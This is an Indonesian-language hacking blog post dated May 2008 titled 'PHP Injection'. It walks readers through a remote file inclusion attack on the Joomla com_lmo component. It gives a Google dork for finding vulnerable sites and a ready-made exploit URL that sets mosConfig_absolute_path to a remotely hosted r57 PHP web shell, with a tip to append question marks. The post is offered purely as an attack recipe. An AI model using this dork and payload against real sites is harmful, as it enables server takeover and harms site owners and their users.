PHP Injection

secreet of php injection… sering kali saya mendengar bagaimana sih php injection itu…. sebagai contoh saya ambil bug dari http://milw0rm.com/exploits/2092 dengan isi yang kurang lebih seperti ini dork: “com_lmo” http://www.vuln.com/components/com_lmo/lmo.php?mosConfig_absolute_path=[evilcode] di situ ditulisakan Dork:’com_lmo” yang di maksud dork disitu adalah keyword pencarian pada google. pada search enggine kita ketikan inurl:”com_lmo” setelah itu baru kita cari file nya satu persatu setelah ketemu Url target kemudian kita ganti url belakang dengan hosting tempat kita menyimpan evilcode sebagai contoh : http://h1.ripway.com/bolehditerawang/script/r57.txt jadi nanti url nya akan jadi seperti ini http://www.vuln.com/components/com_lmo/ lmo.php?mosConfig_absolute_path=http://h1.ripway.com/bolehditerawang/script/r57.txt?? dan jangan lupa pada webbrowser kita tambahin dengan tanda tanya…. mudah mudahan bermanfaat

~ oleh bolehditerawang di/pada Mei 12, 2008.